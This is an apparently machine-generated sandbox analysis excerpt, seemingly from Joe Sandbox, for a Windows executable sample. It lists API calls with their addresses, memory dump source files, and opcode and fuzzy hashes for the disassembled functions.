                                                                                                      • Opcode Fuzzy Hash: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                                      • Instruction Fuzzy Hash: 0EE012E93042015BF700EA6599C1B2F22DCDB44315F00446ABD44CA28BE678CC048B29
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocLock
                                                                                                      • String ID:
                                                                                                      • API String ID: 15508794-0
                                                                                                      • Opcode ID: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                                                      • Instruction ID: 06179efae1cd4c7c45065c0f91b58358bdd8bb936cab03a6fa385f12497be06a
                                                                                                      • Opcode Fuzzy Hash: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                                                      • Instruction Fuzzy Hash: 3E9002C4D10B00B8DC0072B20C1AD3F146CD8C172D3D0486F7004B61C3883C88004839
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocFree
                                                                                                      • String ID:
                                                                                                      • API String ID: 2087232378-0
                                                                                                      • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                      • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                                      • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                      • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                                      APIs
                                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
                                                                                                        • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
                                                                                                        • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1658689577-0
                                                                                                      • Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                                      • Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
                                                                                                      • Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                                      • Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
APIs
• SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
Similarity
• API ID: InfoScroll
• String ID:
• API String ID: 629608716-0
• Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
• Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
• Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
• Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
APIs
  • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
  • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
• SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
  • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
  • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
Similarity
• API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
• String ID:
• API String ID: 3319771486-0
• Opcode ID: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
• Instruction ID: eef1953176fed27c4f60a3b97998f4e8fb1447464a393d6256780c84e8a913cd
• Opcode Fuzzy Hash: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
• Instruction Fuzzy Hash: 5AF0B471248300BFE705DF62ECA6B35B6E8D748714F61047BF40886590E97D5844D51E
APIs
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
• Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
• Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
• Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
APIs
• CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
• Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
• Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
• Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
APIs
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
• Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
• Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
• Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
APIs
• CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
• Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
• Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
• Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
• Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
• Opcode Fuzzy Hash: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
• Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
Similarity
• API ID: FormatMessage
• String ID:
• API String ID: 1306739567-0
• Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
• Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
• Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
• Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
APIs
• GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
Similarity
• API ID: ExtentPointText
• String ID:
• API String ID: 566491939-0
• Opcode ID: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
• Instruction ID: 6b43be1268843882f9474f888990ee0a0f71ddbfb678ee1088bae751a0726d8f
• Opcode Fuzzy Hash: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
• Instruction Fuzzy Hash: E3E086F13097102BD600E67E1DC19DB77DC8A483697148177F458E7392D62DDE1A43AE
APIs
• CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      APIs
                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      APIs
                                                                                                      • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                                                                      Similarity
                                                                                                      • API ID: CloseFind
                                                                                                      • String ID:
                                                                                                      • API String ID: 1863332320-0
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      APIs
                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3934441357-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                                                                      • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                        • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                                                                      Similarity
                                                                                                      • API ID: InfoParametersSystem$ShowWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3202724764-0
                                                                                                      APIs
                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                      Similarity
                                                                                                      • API ID: TextWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 530164218-0
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      APIs
                                                                                                      • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                        • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 734332943-0
                                                                                                      • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                                      • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                                                                      • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                                      • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                                                                      APIs
                                                                                                      • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentDirectory
                                                                                                      • String ID:
                                                                                                      • API String ID: 1611563598-0
                                                                                                      • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                      • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                                                      • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                      • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2340568224-0
                                                                                                      • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                      • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                                                      • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                      • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DestroyWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3375834691-0
                                                                                                      • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                      • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                                                      • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                      • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                      • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                                                                      • Opcode Fuzzy Hash: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                      • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                      • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                                                                      • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                      • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 1452528299-0
                                                                                                      • Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                                      • Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
                                                                                                      • Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                                      • Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
                                                                                                      APIs
                                                                                                      • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00003AD0,00007AD3,00401973), ref: 00401766
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1263568516-0
                                                                                                      • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                      • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                                      • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                      • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2962429428-0
                                                                                                      • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                                      • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                                      • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                                      • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                                      • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                                      • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
